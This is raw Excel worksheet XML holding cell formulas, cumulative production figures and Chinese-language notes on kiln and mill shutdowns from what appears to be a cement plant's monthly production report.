      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]9'!$M$19+'[14]9'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]9'!$N$19+'[14]9'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'8'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]9'!$Q$19+'[14]9'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'8'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]9'!$T$19+'[14]9'!$T$20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G64+'8'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'8'!K64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G65+'8'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'8'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]9'!$Q$74</f>
        <v>1#窑:续停；2#窑:续停；1#磨:10:00-22:20避峰停机。2#磨:15:00-24:00库满停机。3#磨:8:00-24:00避峰停机。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G66+'8'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'8'!K66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G67+'8'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'8'!K67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'[15]9'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]9'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'8'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]9'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'8'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]9'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]9'!$Q$77</f>
        <v>1#磨8:00-22:15避峰停机:14.25小时(避峰)。2#磨8:00-22:15避峰停机:14.25小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]9'!$D$43+'[15]9'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]9'!$E$43+'[15]9'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'8'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]9'!$H$43+'[15]9'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'8'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]9'!$K$43+'[15]9'!$K$44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'[15]9'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]9'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'8'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]9'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'8'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]9'!$K$45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G71+'8'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'8'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]9'!$Q$80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G72+'8'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'8'!K72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G73+'8'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'8'!K73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G74+'8'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'8'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]9'!$Q$83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G75+'8'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'8'!K75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G76+'8'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'8'!K76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G77+'8'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'8'!K77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G78+'8'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'8'!K78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'[16]9'!$E$7</f>
        <v>560.62</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'8'!H79</f>
        <v>4725.2</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>151853.67</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]9'!$I$7</f>
        <v>522</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'8'!K79</f>
        <v>4784.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>146675.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]9'!$L$7</f>
        <v>4825.48</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>9.65096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'[16]9'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'8'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]9'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'8'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]9'!$Y$15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G81+'8'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'8'!K81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G82+'8'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'8'!K82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G83+'8'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'8'!K83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G84+'8'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'8'!K84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G85+'8'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'8'!K85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10/31</f>
        <v>0.32258064516129</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46001</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18050.74</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'9'!H5</f>
        <v>209517.75</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6364383.78</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>21481.8</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'9'!K5</f>
        <v>228087.549</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6378158.68</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>248898.025</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>66.550274064171</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]10'!$W$101</f>
        <v>268.590899979956</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]10'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]10'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]10'!$T$101</f>
        <v>62.3625</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]10'!$U$101</f>
        <v>96.23625</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]10'!$V$101</f>
        <v>65.5800145348837</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]10'!$Q$101</f>
        <v>14.967</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]10'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]10'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]10'!$D$23+'[11]10'!$D$17+'[12]10'!$D$17+'[13]10'!$D$25+'[14]10'!$D$8+'[14]10'!$D$15+'[15]10'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]10'!$E$23+'[11]10'!$E$17+'[12]10'!$E$17+'[13]10'!$E$25+'[14]10'!$E$8+'[14]10'!$E$15+'[15]10'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'9'!H6</f>
        <v>2107</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>278456.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]10'!$I$23+'[11]10'!$I$17+'[12]10'!$I$17+'[13]10'!$I$25+'[14]10'!$E$23+'[14]10'!$E$30+'[15]10'!$H$7</f>
        <v>450.34</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'9'!K6</f>
        <v>6900.51</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>269098.21</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]10'!$L$23+'[11]10'!$L$17+'[12]10'!$L$17+'[13]10'!$L$25+'[14]10'!$H$23+'[14]10'!$H$30+'[15]10'!$K$7</f>
        <v>27319.33</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]10'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]10'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]10'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]10'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]10'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]10'!$V$102</f>
        <v>34.4621971899225</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]10'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]10'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]10'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]10'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]10'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'9'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]10'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'9'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]10'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]10'!$W$107</f>
        <v>118.756698821008</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]10'!$X$107</f>
        <v>125.74104382615</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]10'!$Y$107</f>
        <v>131.668984861737</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]10'!$T$107</f>
        <v>38.875</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]10'!$U$107</f>
        <v>45.825</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]10'!$V$107</f>
        <v>31.4366521317829</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]10'!$Q$107</f>
        <v>9.33</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]10'!$R$107</f>
        <v>109.98</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]10'!$S$107</f>
        <v>2595.41</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]10'!$D$27+'[11]10'!$D$18+'[13]10'!$D$26+'[14]10'!$D$10+'[14]10'!$D$17+'[15]10'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]10'!$E$27+'[11]10'!$E$18+'[13]10'!$E$26+'[14]10'!$E$10+'[14]10'!$E$17+'[15]10'!$E$9</f>
        <v>0</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'9'!H8</f>
        <v>18624</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>544160.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]10'!$I$27+'[11]10'!$I$18+'[13]10'!$I$26+'[14]10'!$E$25+'[14]10'!$E$32+'[15]10'!$H$9</f>
        <v>2648.6</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'9'!K8</f>
        <v>25235.58</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>532980.29</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]10'!$L$27+'[11]10'!$L$18+'[13]10'!$L$26+'[14]10'!$H$25+'[14]10'!$H$32+'[15]10'!$K$9</f>
        <v>35268.32</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]10'!$W$108</f>
        <v>139.222316145393</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]10'!$X$108</f>
        <v>130.66349458102</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]10'!$Y$108</f>
        <v>127.583385995135</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]10'!$T$108</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]10'!$U$108</f>
        <v>47.2875</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]10'!$V$108</f>
        <v>27.9837693798449</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]10'!$Q$108</f>
        <v>11.83</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]10'!$R$108</f>
        <v>113.49</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]10'!$S$108</f>
        <v>2310.34</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]10'!$D$24+'[11]10'!$D$19+'[12]10'!$D$20+'[13]10'!$D$27+'[14]10'!$D$11+'[14]10'!$D$18+'[15]10'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]10'!$E$24+'[11]10'!$E$19+'[12]10'!$E$20+'[13]10'!$E$27+'[14]10'!$E$11+'[14]10'!$E$18+'[15]10'!$E$10</f>
        <v>14353</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'9'!H9</f>
        <v>156424</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4291812.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]10'!$I$24+'[11]10'!$I$19+'[12]10'!$I$20+'[13]10'!$I$27+'[14]10'!$E$26+'[14]10'!$E$33+'[15]10'!$H$10</f>
        <v>14260.91</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'9'!K9</f>
        <v>153291.759</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4250770.57</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]10'!$L$24+'[11]10'!$L$19+'[12]10'!$L$20+'[13]10'!$L$27+'[14]10'!$H$26+'[14]10'!$H$33+'[15]10'!$K$10</f>
        <v>113997.953</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]10'!$W$109</f>
        <v>0</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]10'!$X$109</f>
        <v>272.595281306715</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]10'!$Y$109</f>
        <v>271.352232336368</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]10'!$T$109</f>
        <v>0</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]10'!$U$109</f>
        <v>36.7333333333333</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]10'!$V$109</f>
        <v>34.9291424418604</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]10'!$Q$109</f>
        <v>0</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]10'!$R$109</f>
        <v>88.16</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]10'!$S$109</f>
        <v>2883.74999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]10'!$D$25+'[11]10'!$D$20+'[12]10'!$D$21+'[13]10'!$D$28+'[14]10'!$D$12+'[14]10'!$D$19+'[15]10'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]10'!$E$25+'[11]10'!$E$20+'[12]10'!$E$21+'[13]10'!$E$28+'[14]10'!$E$12+'[14]10'!$E$19+'[15]10'!$E$11</f>
        <v>1405</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'9'!H10</f>
        <v>19258</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>936785.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]10'!$I$25+'[11]10'!$I$20+'[12]10'!$I$21+'[13]10'!$I$28+'[14]10'!$E$27+'[14]10'!$E$34+'[15]10'!$H$11</f>
        <v>2959.48</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'9'!K10</f>
        <v>29060.8</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>926289.52</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]10'!$L$25+'[11]10'!$L$20+'[12]10'!$L$21+'[13]10'!$L$28+'[14]10'!$H$27+'[14]10'!$H$34+'[15]10'!$K$11</f>
        <v>51404.142</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]10'!$W$110</f>
        <v>253.04347826087</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]10'!$X$110</f>
        <v>264.96062992126</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]10'!$Y$110</f>
        <v>268.763527564402</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]10'!$T$110</f>
        <v>47.9166666666667</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]10'!$U$110</f>
        <v>26.4583333333333</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]10'!$V$110</f>
        <v>34.2485465116279</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]10'!$Q$110</f>
        <v>11.5</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]10'!$R$110</f>
        <v>63.5</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]10'!$S$110</f>
        <v>2827.56</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]10'!$D$26+'[11]10'!$D$21+'[12]10'!$D$19+'[13]10'!$D$29+'[14]10'!$D$13+'[14]10'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]10'!$E$26+'[11]10'!$E$21+'[12]10'!$E$19+'[13]10'!$E$29+'[14]10'!$E$13+'[14]10'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'9'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]10'!$I$26+'[11]10'!$I$21+'[12]10'!$I$19+'[13]10'!$I$29+'[14]10'!$E$28+'[14]10'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'9'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]10'!$L$26+'[11]10'!$L$21+'[12]10'!$L$19+'[13]10'!$L$29+'[14]10'!$H$28+'[14]10'!$H$35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10583</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'9'!H12</f>
        <v>103036</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5045427.25</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>14203.58</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'9'!K12</f>
        <v>177317.461</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5206423.837</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>324415.24400005</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>73.8986888382803</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]10'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]10'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]10'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]10'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]10'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]10'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]10'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]10'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]10'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'9'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'9'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>59.5257328440459</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]10'!$W$68</f>
        <v>273.458333333333</v>
      </c>
